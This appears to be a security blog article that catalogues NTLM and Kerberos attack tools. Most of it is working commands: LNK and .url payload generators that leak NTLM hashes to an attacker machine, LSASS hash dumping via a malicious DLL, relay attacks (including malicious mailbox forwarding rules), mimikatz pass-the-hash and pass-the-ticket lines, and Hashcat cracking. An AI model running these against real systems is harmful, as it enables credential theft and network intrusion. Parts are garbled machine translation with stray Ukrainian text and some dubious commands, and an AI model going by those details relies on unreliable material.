A deep dive into NTLM attacks. How to protect your systems

7 February 2024 19 minutes Author: Cyber Witcher

This article provides a detailed overview of NTLM exploits, including a description of NTLM’s core components, such as the authentication process, the challenge-response mechanism, and hash-based authentication. Also introduced are the various versions of NTLM, including NTLMv1 and NTLMv2, with an emphasis on security improvements that were made in NTLMv2 to address vulnerabilities found in NTLMv1.

NTLM abuse techniques

NTLM (NT LAN Manager) is a set of security protocols used by Microsoft Windows operating systems for user authentication, integrity, and privacy. It has evolved over time with different versions and is widely used in Windows environments for single sign-on (SSO) and network authentication. ![[server-during-ntlm-authentication.png]] [https://www.ionos.co.uk/digitalguide/server/know-how/ntlm-nt-lan-manager/]

NTLM components:

Authentication process:

  • NTLM is mainly used for authentication. When a user tries to log on to Windows, NTLM is one of the authentication protocols that can be used.

  • The process involves exchanging call-response messages to verify the user’s identity.

Call-response mechanism:

  • NTLM uses a challenge-response mechanism to authenticate users. The server sends a challenge to the client, and the client responds with a hash of the user’s password.

  • The server compares the received response with the expected one to verify the user’s identity.

Hash-based authentication:

  • Instead of sending passwords over the network, NTLM relies on the user’s password hash. This adds a layer of security by avoiding the transmission of clear text passwords.

Versions:

  • There are different versions of NTLM, including NTLMv1 and NTLMv2. NTLMv2 is more secure and includes improvements to address vulnerabilities found in NTLMv1.

NTLM Security Attacks Mindmap

   +---------------------+
         |     NTLM Attacks     |
         +---------------------+
                   |
                   v

+-----------------------+       +-----------------------+
|   Pass-the-Hash (PtH) |       |    Pass-the-Ticket    |
+-----------------------+       +-----------------------+
          |                               |
          v                               v
+-----------------------+       +-----------------------+
| Credential Sniffing   |       | Kerberos Ticket Sniff  |
+-----------------------+       +-----------------------+
          |                               |
          v                               v
+-----------------------+       +-----------------------+
| Credential Stuffing   |       | Ticket Renewal Attack |
+-----------------------+       +-----------------------+
          |                               |
          v                               v
+-----------------------+       +-----------------------+
| Brute-Force Attacks   |       | Ticket Granting       |
+-----------------------+       | Ticket (TGT) Attacks  |
          |                               |
          v                               v
+-----------------------+       +-----------------------+
| Relay Attacks         |       | Golden Ticket Attack  |
+-----------------------+       +-----------------------+
          |                               |
          v                               v
+-----------------------+       +-----------------------+
| SMB Relay             |       | Silver Ticket Attack  |
+-----------------------+       +-----------------------+
          |                               |
          v                               v
+-----------------------+       +-----------------------+
| HTTP Relay            |       | Overpass-the-Hash     |
+-----------------------+       +-----------------------+

Extract NTLMssp:

ID: sinnaj-r / NTLMssp-Extract. Name: NTLMssp-Extract. Attacks: Extracting NetNTLMv2 hashes from NTMLssp-HTTP authentications

Commands and codes:

Installation: Clone the repository. Run the ntlmssp_extract.py file. Requires pyshark pysharkhttps://github.com/KimiNewt/pyshark )and Python 3.

Usage: Execute the Python file. Choose an output format: 0 for (cuda/ocl)Hashcat or 1 for JohnTheRipper. Enter the full path to the capture file. Optionally remove unrelated packages from the record to speed up removal.

ntlmRelayToEWS:

ID: ntlmRelayToEWS. Name: ntlmRelayToEWS. Posted by Arno0x0x – @Arno0x0x

Attacks: NTLM relay attacks on Exchange Web Services (EWS). Create SMBListener on port 445 and HTTPListener on port 80. Pass NTLM negotiation to target EWS server

Limitations and improvements:

Tested on Exchange Server 2010 SP2, can work on Exchange 2016. SOAP request templates designed for Exchange 2010 SP2. SOAP request templates can be adapted for new versions using the Microsoft EWS Managed API in trace mode.

Prerequisites:

A proper/clean installation of Impacket is required. Follow Ipacket’s instructions to set up.

Using:

Carry out attacks on behalf of the relayed user (victim). For more information, see the help: ./ntlmRelayToEWS -h. Use the –verbose or -v flag for more debugging information.

Realized attacks:

  • sendMail: Send an HTML email to a list of recipients.

  • getFolder: Get all items from a predefined folder (inbox, sent, calendar, tasks).

  • forwardRule: Create a malicious forwarding rule that forwards all incoming messages for the victim to another email address.

  • setHomePage: Set the home page of a folder (usually for the Inbox) by specifying a URL.

  • addDelegate: Set the delegate address for the victim’s primary mailbox.

How to get victim credentials:

  1. Use well-known techniques to trick the victim into sending credentials to ntlmRelayToEWS:

  2. Send an email with a hidden image that points to the ntlmRelayToEWS server.

  3. Create a link file with an icon pointing to ntlmRelayToEWS using a UNC path.

  4. Perform LLMNR, NBNS, or WPAD poisoning to intercept SMB or HTTP traffic from the victim.

ntlmthief:

- **ID:** ntlmthief
- **Title:** NTLMThief
- **Repository:** [NTLMThief](https://github.com/4ndr34z/ntlmthief)
- **Attacks:**
    - Extracts NetNTLMv1/v2 hashes from network traffic
    - Can target protocols like HTTP, SMB, LDAP, IMAP, etc.
- **Commands and Codes:**
    - Refer to the official documentation in the repository for usage and examples. 1. **Word-Thief:**

- **ID:** Word-Thief
- **Title:** Word-Thief
- **Repository:** [Word-Thief](https://github.com/4ndr34z/ntlmthief)
- **Attacks:**
    - Specific attacks related to Microsoft Word documents.
    - May involve phishing, document-based attacks, or other techniques to extract NTLM hashes.
- **Commands and Codes:**
    - Refer to the official documentation in the repository for usage and examples. 2. **PowerPoint-Thief:**

- **ID:** PowerPoint-Thief
- **Title:** PowerPoint-Thief
- **Repository:** [PowerPoint-Thief](https://github.com/4ndr34z/ntlmthief)
- **Attacks:**
    - Specific attacks related to Microsoft PowerPoint documents.
    - Similar to Word-Thief, may involve exploiting PowerPoint files for NTLM hash extraction.
- **Commands and Codes:**
    - Refer to the official documentation in the repository for usage and examples. 3. **Excel-Thief:**

- **ID:** Excel-Thief
- **Title:** Excel-Thief
- **Repository:** [Excel-Thief](https://github.com/4ndr34z/ntlmthief)
- **Attacks:**
    - Specific attacks related to Microsoft Excel documents.
    - Focus on extracting NTLM hashes through Excel-based techniques.
- **Commands and Codes:**
    - Refer to the official documentation in the repository for usage and examples. 4. **Adobe pdf-Thief:**

- **ID:** Adobe pdf-Thief
- **Title:** Adobe PDF-Thief
- **Repository:** [Adobe pdf-Thief](https://github.com/4ndr34z/ntlmthief)
- **Attacks:**
    - Specific attacks related to Adobe PDF documents.
    - Exploiting PDF files to extract NTLM hashes.
- **Commands and Codes:**
    - Refer to the official documentation in the repository for usage and examples.

NTLMParse:

ID: NTLMParse. Name: NTLMParse. review: A utility for decoding NTLM messages in base64 encoding. Provides information about the main properties and fields in the message.

Usage: Pass a Base64-encoded message to a program to decode.

example:

`➜  ~ pbpaste | NTLMParse (ntlm.AUTHENTICATE_MESSAGE) {   Signature: ([]uint8) (len=8 cap=585) {     00000000  4e 54 4c 4d 53 53 50 00                           |NTLMSSP.|   },   MessageType: (uint32) 3,   LmChallengeResponseFields: (struct { LmChallengeResponseLen uint16; LmChallengeResponseMaxLen uint16; LmChallengeResponseBufferOffset uint32; LmChallengeResponse []uint8 }) {     LmChallengeResponseLen: (uint16) 24,     LmChallengeResponseMaxLen: (uint16) 24,     LmChallengeResponseBufferOffset: (uint32) 160,     LmChallengeResponse: ([]uint8) (len=24 cap=425) {       00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|       00000010  00 00 00 00 00 00 00 00                           |........|     }   },   NtChallengeResponseFields: (struct { NtChallengeResponseLen uint16; NtChallengeResponseMaxLen uint16; NtChallengeResponseBufferOffset uint32; NtChallengeResponse []uint8; NTLMv2Response ntlm.NTLMv2_RESPONSE }) {     NtChallengeResponseLen: (uint16) 384,     NtChallengeResponseMaxLen: (uint16) 384,     NtChallengeResponseBufferOffset: (uint32) 184,     NtChallengeResponse: ([]uint8) (len=384 cap=401) {       00000000  30 eb 30 1f ab 4f 37 4d  79 59 28 73 38 51 19 3b  |0.0..O7MyY(s8Q.;|       00000010  01 01 00 00 00 00 00 00  89 5f 6d 5c c8 72 d8 01  |........._m\.r..|       00000020  c9 74 65 45 b9 dd f7 35  00 00 00 00 02 00 0e 00  |.teE...5........|       00000030  43 00 4f 00 4e 00 54 00  4f 00 53 00 4f 00 01 00  |C.O.N.T.O.S.O...|       00000040  1e 00 57 00 49 00 4e 00  2d 00 46 00 43 00 47 00  |..W.I.N.-.F.C.G.|   } }`

Sample message for testing:

TlRMTVNTUAADAAAAGAAYAKAAAACAAYABuAAAABoAGgBYAAAAEAAQAHIAAAAeAB4AggAAABAAEAA4AgAAFYKI4goAYUoAAAAPqfU7N7/JSXVfIdKvlIvcQkMATwBOAFQATwBTAE8ALgBMAE8AQwBBAEwAQQBDAHIAbwBzAHMAZQByAEQARQBTAEsAVABPAFAALQBOAEkARAA0ADQANQBNAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADDrMB+rTzdNeVkoczhRGTsBAQAAAAAAAIlfbVzIctgByXRlRbnd9zUAAAAAAgAOAEMATwBOAFQATwBTAE8AAQAeAFcASQBOAC0ARgBDAEcAVQA0AEcASABPADAAOAA0AAQAGgBDAE8ATgBUAE8AUwBPAC4ATABPAEMAQQBMAAMAOgBXAEkATgAtAEYAQwBHAFUANABHAEgATwAwADgANAAuAEMATwBOAFQATwBTAE8ALgBMAE8AQwBBAEwABQAaAEMATwBOAFQATwBTAE8ALgBMAE8AQwBBAEwABwAIAIlfbVzIctgBBgAEAAIAAAAIADAAMAAAAAAAAAABAAAAACAAABQaOHb4nG5F2JL1tA5kL+nKQXJSJLDWljeBv+/XlPXpCgAQAON+EDXYnla0bjpwA8gfVEgJAD4ASABUAFQAUAAvAHMAdABzAC4AYwBvAG4AdABvAHMAbwBjAG8AcgBwAG8AcgBhAHQAaQBvAG4ALgBjAG8AbQAAAAAAAAAAAKDXom0m65knt1NeZF1ZxxQ=

ADFSRelay:

ID: ADFSRelay. Name: ADFSRelay. Overview: A Proof of Concept Utility for Investigating NTLM Relay Attacks Targeting the ADFS Service.

Usage: The only required argument is the URL of the ADFS server for an NTLM relay attack. The three optional arguments are -debug to enable debug mode, -port to specify the port the service should listen on (default 8080), and -targetSite to specify the ADFS site to target the relay attack.

example:

➜ ~ ADFSRelay -h Usage of ADFSRelay: -debug Enables debug output -help Show the help menu -port int The port the HTTP listener should listen on (default 8080) -targetSite string The ADFS site to target for the relaying attack (e.g. https://sts.contoso.com) ➜ ~

LNKUp:

ID: LNKUp. Name: LNKUp – LNK Data Filtration payload generator. Repository: LNKUp. Overview: A tool for creating LNK payloads that extract data when rendered or run. Usage: Designed specifically for Windows.

Types of payload:

NTLM:

Steals the user’s NTLM hash during rendering. A listener server is required, such as the Metasploit module server. More on leaking NTLM hashes: NTLM hashes are an old Microsoft design flaw

Example of use:

lnkup.py --host localhost --type ntlm --output out.lnk

Environment:

Steals user environment variables. Examples: %PATH%, %USERNAME%, etc. Requires variables to be set using –vars.

Example of use:

lnkup.py --host localhost --type environment --vars PATH USERNAME JAVA_HOME --output out.lnk

Additional parameters:

Use –execute to specify a command to run when the shortcut is double-clicked.

example:

lnkup.py --host localhost --type ntlm --output out.lnk --execute "shutdown /s"

Installation:

Installation requirements using:

pip install -r requirements.txt

Known issues:

This tool will not work on OSX or Linux machines; it is specially designed for Windows. There may be issues with icon caching in some situations. Rebuild the payload if it fails after the first time. Capturing NTLM hashes requires a Metasploit module responder or server. To get the environment variables, start a web server like Apache, Nginx or any other.

Information:

The creator of the tool is not responsible for any actions taken with this tool. Contact the author with any questions by opening the issue or via Twitter, @Plazmaz.

Lnkbomb:

ID: Lnkbomb. Name: Lnkbomb – Malicious Quick Access File Downloader. Repository: Lnkbomb.

Overview: Used to download malicious hotkey files to unsecured file shares. Exploits a vulnerability that causes Windows to look for an icon file associated with a shortcut file, directing it to a penetration tester’s machine. Collects NTLMv1 or NTLMv2 hashes (depending on the configuration of the victim host) for later use. The payload file is loaded by the tester directly into the specified unsecured file. Version 2.0 uses the pysmb library, which allows unauthenticated and authenticated payload removal.

Using Python:

Installation:

git clone https://github.com/dievus/lnkbomb.git cd lnkbomb python3 lnkbomb.py -h

Command line flags:

  • -h, –help: list help options

  • -t, –target: Specifies the target IP address

  • -a, –attacker: Specifies the IP address of the tester’s attacking machine

  • -r, –recover: Used to remove the payload after testing is complete (eg -r payloadname.url)

  • -w, –windows: Required to configure appropriate ports for Windows shares (new command)

  • -l, –linux: required to configure appropriate ports for Linux shares (new command)

  • -n, –netbios: NetBIOS name for Windows target machines must be included (new command)

examples:

`python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows`
       
       
 `python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows -r dicnwdsebl.url`

Capture the NTLM hash:

Use a tool like Responder or smbserver to get the NTLM hash.

`responder -I eth0 -dwFP -v`

or

smbserver.py . . -smb2support

Notes:

Intended for ethical hacking and penetration testing purposes only. Condemns testing targets without permission. The tool uses .url shortcuts instead of .lnk extensions as a deliberate choice. Activation with .url instead of .lnk.

DragonCastle:

ID: DragonCastle. Name: DragonCastle – AutodialDLL Lateral Movement Technique and SSP for NTLM Hash Scraping.

Description: A PoC that combines the AutodialDLL and SSP lateral movement techniques to flush NTLM hashes from the LSASS process. Downloads a DLL to the target machine that allows you to remotely modify the AutodialDLL registry entry and start/restart the BITS service. Svchosts loads the DLL, sets AutodialDLL to its default value, and performs an RPC request to force LSASS to load the same DLL as a security support provider. Retrieves NTLM hashes and key/IV from LSASS process memory. DLLMain always returns False so processes don’t save it.

Reservation:

Works when RunAsPPL is not enabled. Supports 3DES decryption; easy to add code for AES. Implemented for certain versions of Windows (see the list in the information provided).

Using:

`python3 dragoncastle.py -h`

Command line flags:

  • -u, –username: Valid username

  • -p, –password: Valid password (if omitted, prompt if not -no-pass)

  • -d, –domain: A valid domain name

  • -hashes: NT/LM hashes (LM hash can be empty)

  • -no-pass: don’t ask for password (useful for -k)

  • -k: Use Kerberos authentication. Gets credentials from a ccache file based on target parameters.

  • -dc-ip: IP address of the domain controller.

  • -target-ip: The IP address of the target machine.

  • -local-dll: The location of the DLL (local) to be installed in the target.

  • -remote-dll: The path used to update the AutodialDLL registry value.

examples:

`python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll`

query-ntlm:

ID: requests-ntlm. Name: HTTP NTLM Authentication for Request Library. Description: This package enables HTTP NTLM authentication using the request library.

Using:

HttpNtlmAuth extends requests.AuthBase, making it easier to use:

import requests from requests_ntlm import HttpNtlmAuth requests.get("http://ntlm_protected_site.com", auth=HttpNtlmAuth('domain\\username', 'password'))

HttpNtlmAuthможна використовувати з a Sessionдля використання пулу з’єднань для більшої ефективності.

import requests from requests_ntlm import HttpNtlmAuth session = requests.Session() session.auth = HttpNtlmAuth('domain\\username', 'password') session.get('http://ntlm_protected_site.com')

Installation:

`pip install requests_ntlm`

Requirements: requests. pyspnego

LDAP Relay Scan:

ID: LDAP Relay Scan. Name: Tool for checking domain controllers for LDAP server security. Description: A tool to test domain controllers for LDAP server security against NTLM authentication relays. It lists LDAP security features, including LDAPS channel binding and LDAP server signing requirements.

Installation:

It is recommended to use Docker or Python virtual environment.

Docker:

Make sure Docker is installed on your machine. Clone the repository and change directory.

git clone https://github.com/zyn3rgy/LdapRelayScan.git && cd LdapRelayScan

Create a Docker container.

docker build -f docker/Dockerfile -t ldaprelayscan .

[Optional] Make sure the script is running properly.

docker run ldaprelayscan -h

Python virtual environment:

Make sure you have Python virtualenv installed on your machine. Clone the repository and change directory.

git clone https://github.com/zyn3rgy/LdapRelayScan.git && cd LdapRelayScan

Create a virtual Python environment for the project.

virtualenv env

Activate the Python virtual environment.

source venv/bin/activate

Establish exact dependencies of requirements versions.

python3 -m pip install -r requirements_exact.txt

[Optional] Make sure the script is running properly.

python3 LdapRelayScan.py -h

Using:

The tool has two methods: LDAPS (default) and BOTH. LDAPS only requires the IP address of the domain controller and a link binding check (can be done without authentication). BOTH method requires username and password or NT hash, LDAP signature verification, and LDAP channel binding (authentication required).

Arguments:

  • -h, –help: Show help message and exit.

  • -method method: LDAPS or BOTH – LDAPS checks channel binding, BOTH checks LDAP signing and LDAP channel binding [authentication required].

  • -dc-ip DC_IP: DNS name server on the network. Any DC IPv4 address should work.

  • -u username: domain username value.

  • -timeout timeout: MSLDAP client connection timeout.

  • -p password: domain username value.

  • -nthash nthash: NT password hash.

examples:

Examples of using a basic/virtual environment:

python3 LdapRelayScan.py -method LDAPS -dc-ip 10.0.0.20 python3 LdapRelayScan.py -method BOTH -dc-ip 10.0.0.20 -u domainuser1 python3 LdapRelayScan.py -method BOTH -dc-ip 10.0.0.20 -u domainuser1 -p badpassword2 python3 LdapRelayScan.py -method BOTH -dc-ip 10.0.0.20 -u domainuser1 -nthash e6ee750a1feb2c7ee50d46819a6e4d25

Docker usage examples:

docker run ldaprelayscan -h docker run ldaprelayscan -dc-ip 10.0.0.20 docker run ldaprelayscan -dc-ip 10.0.0.20 -method BOTH -u domainuser1 -p secretpass docker run -e PROXY_CONFIG='socks5 127.0.0.1 9050' --network=host ldaprelayscan -dc-ip 10.0.0.20 -method BOTH -u domainuser1 -p secretpass

Specifics of error-based enumeration:

[LDAPS] Channel Binding Token Requirements:

On the patched domain controller, there is an option to force an LDAPS channel binding. This is determined in terms of non-authentication by analyzing errors during the LDAP binding process.

Decrypting and monitoring LDAP traffic over SSL/TLS allows you to identify errors when channel binding is applied and when it is not. The specific error, data 80090346 (SEC_E_BAD_BINDINGS), indicates an incorrect SSPI channel binding.

The tool distinguishes between different domain controller settings: LDAP server channel binding token requirement policies, such as Never, When Supported, or Always.

“Never” vs. “When supported” vs. “Always”:

The tool intentionally miscalculates channel binding information when the policy is set to When Supported, producing the same data error 80090346.

[LDAP] Server Signing Requirements:

Domain Controller: The LDAP server signing requirement policy can be set to None, Signing Required, or undefined.

If not specified, no signature is required by default. The tool detects a requirement when a simple connection attempt returns a result code of 8, indicating that stronger authorization is required.

Literature:

Invaluable resources for contextualizing and understanding this tool and how it fits into typical attack scenarios.

Various individuals: @HackAndDo, @_nwodtuhs, @_dirkjan,

lsarelayx:

ID: lsarelayx. Name: System-wide NTLM relay tool. Description: lsarelayx is a system-wide NTLM relay tool designed to relay incoming NTLM-based authentication to the host on which it runs. It relays any incoming authentication request that includes SMB, HTTP/HTTPS, LDAP/LDAPS, or any other third-party application that implements the Windows authentication API.

features:

Relays system-wide NTLM connections, including SMB, HTTP/HTTPS, LDAP/LDAPS, or any other third-party application that implements the Windows authentication API.

Drops incoming Kerberos authentication requests to NTLM where possible, forcing clients to fall back to NTLM.

Performs an LDAP query for the relayed user to retrieve group membership information and generates the correct authentication token for the original query.

Resets NetNTLM messages for offline hacking.

Supports passive mode, which does not relay, but only resets captured NetNTLM hashes (no Kerberos fallback in this mode).

How it works:

lsarelayx consists of three parts: liblsarelayx.dll (a fake LSA authentication provider), lsarelayx.exe (a user-mode console program as a management interface), and a new ntlmrelayx server module called RAW.

liblsarelayx.dll:

The authentication provider LSA loaded by lsarelayx intercepts NTLM and Negotiate packets, redirects authentication requests to lsarelayx over a local named relay channel, and resets NetNTLM hashes.

lsarelayx.exe:

The main console application loads a specialized LSA authentication provider, listens for incoming NTLM and Negotiate tokens, relays to the RAW ntlmrelayx server module, and performs LDAP queries to capture group information. RAW ntlmrelayx module: A new ntlmrelayx server module called RAW accepts raw NTLM messages directly from lsarelayx.

Using:

Active mode: Start the ntlmrelayx RAW server module.

python examples\ntlmrelayx.py -smb2support --no-wcf-server --no-smb-server --no-http-server "-t" smb://dc.victim.lan

Run lsarelayx in active relay mode.

lsarelayx.exe --host 192.168.1.1

Passive mode: Run lsarelayx in passive mode.

lsarelayx.exe

Reservation:

liblsarelayx.dll cannot be unloaded after loading in lsass.exe due to LSA plugins limitations.

An LSA plugin that is not a real plugin may be implemented as a reflective loader inside the plugin in the future.

Development was performed on Windows 10 and Server 2016. Testing on other versions may require manual configuration.

!!WARNING!!: liblsarelayx.dll will be loaded into the critical lsass.exe process. Errors can cause lsass.exe to crash, causing the host to reboot after 60 seconds.

Pas-the-Gauche (Pth)

Attack flow:

  • Get Hash: Collect or extract hashed credentials (NTLM or LM hash) from a compromised system.

  • Pass Hash: Use the resulting hash to authenticate to other systems or services without needing an actual plaintext password.

  • Lateral Movement: Move laterally in the network, increasing your privileges and gaining access to additional systems.

Commands and codes:

mimikatz.exe "sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash>"

mpacket’s psexec.py: Execute commands on a remote system using a captured hash.

psexec.py <target> -hashes :<hash>

Hash transfer tools: Various tools like Windows Credential Editor (WCE) or Metasploit’s PsExec module.

wce.exe -w

Pass-the-Ticket (PtT)

Attack flow:

  • Withdrawal of tickets. Obtain a Kerberos Ticket Granting Ticket (TGT) or Ticket-Granting Service (TGS) from a compromised system.

  • Pass a ticket: Use a received ticket to authenticate to other systems or services without requiring public user credentials.

  • Lateral Movement: Move laterally in the network, increasing your privileges and gaining access to additional systems.

Commands and codes:

Mimikatz: A powerful post-exploitation tool.

mimikatz.exe "kerberos::ptt <base64_ticket>"

Psexec.py Impacket: Execute commands on a remote system using a captured ticket.

psexec.py <target> -k -ticket <base64_ticket>

KRBTTGT Abuse: Abusing the Kerberos TGT for lateral movement.

kirbikator krbtgt/<domain>@<domain> -t <base64_tgt>

Overpass-the-Hash (OtH) ID: OTH-001

Attack flow:

  1. Initial credential theft. Obtain valid credentials using various methods such as phishing, password spraying, or credential injection.

  2. Hash Transfer (PtH): Use received credentials to extract a hash value (such as NTLM or Kerberos) from a compromised system.

  3. Overpass-the-Hash: Use extracted hash values to access additional systems or resources on the network without the need for exposed credentials.

  4. Lateral Traversal: Use compromised credentials to laterally traverse the network, elevate privileges, and gain access to sensitive information.

Commands and codes:

Pass-the-Hash (PtH) with Mimikatz: Use Mimikatz to perform PtH with the hash removed.

mimikatz.exe "sekurlsa::pth /user:<username> /ntlm:<NTLM_hash> /domain:<domain> /run:<command>"

Key Transfer (PtK) with Impacket: Use Impacket’s psexec module to perform PtK with an NTLM hash.

psexec.py <target_IP> -hashes :<NTLM_hash> -u <username> -p <password>

Overpass-the-Hash with CrackMapExec (CME): Use CME for lateral traversal using compromised credentials.

cme smb <target_IP> -u <username> -p :<NTLM_hash>

HTTP Relay

Attack flow:

  • Target Identity: Define a target web application that uses NTLM authentication for user access.

  • NTLM Credential Harvesting: Intercepting NTLM authentication traffic between the client and the target web application.

  • HTTP Relay: Relay intercepted NTLM authentication to another server or application.

  • Successful authentication: Achieve successful authentication of the target web application using NTLM relay credentials.

Commands and codes:

Responder for NTLM Relay: Use Responder to perform NTLM Relay attacks. bash responder -I <interface> -w -r -v ‍‍‍

Ntlmrelayx for HTTP relay: Use ntlmrelayx from the Impacket toolkit to relay NTLM authentication.

ntlmrelayx.py -t <target_url> --no-http-server

Application-Specific HTTPD-NTLM-Relay: Use HTTPD-NTLM-Relay for application-specific purposes.

./httpd-ntlm-relay -u http://<target_url> -l <local_IP> -r <remote_IP>

Brute force attacks with Hashcat

Attack flow:

  • Hash Identification: Obtain target password hashes from a compromised system or database dump.

  • Hashcat Configuration: Prepare Hashcat for brute force attacks by choosing the appropriate hashing mode and attack type.

  • Create a wordlist: Create or select a wordlist that contains potential passwords for the target hashes.

  • Brute-Forcing: Run Hashcat to systematically try password combinations against target hashes.

  • Password Recovery: Identify successful password matches from Hashcat results.

Commands and codes:

Hashcat Modes:

  • MD5:-m 0

  • SHA-1:-m 100

  • SHA-256:-m 1400

  • NTLM:-m 1000

Brute force attack:

  • Прямий (інкрементальний):-a 3

  • Комбінація:-a 1

  • Маска Атака:-a 3 --increment -1 ?u?l?d

Word list attack:

  • Стандартний список слів:hashcat -m 1000 -a 0 hashes.txt /path/to/wordlist.txt

Incremental brute force:

  • Тільки числові:hashcat -m 1000 -a 3 hashes.txt -1 ?d

  • буквено-цифровий:hashcat -m 1000 -a 3 hashes.txt -1 ?l?d

Mask Attack:

  • Укажіть набір символів:hashcat -m 1000 -a 3 hashes.txt -1 ?l?d ?1?1?1?1

This article is made for informational purposes only

Other related articles
Found an error?
If you find an error, take a screenshot and send it to the bot.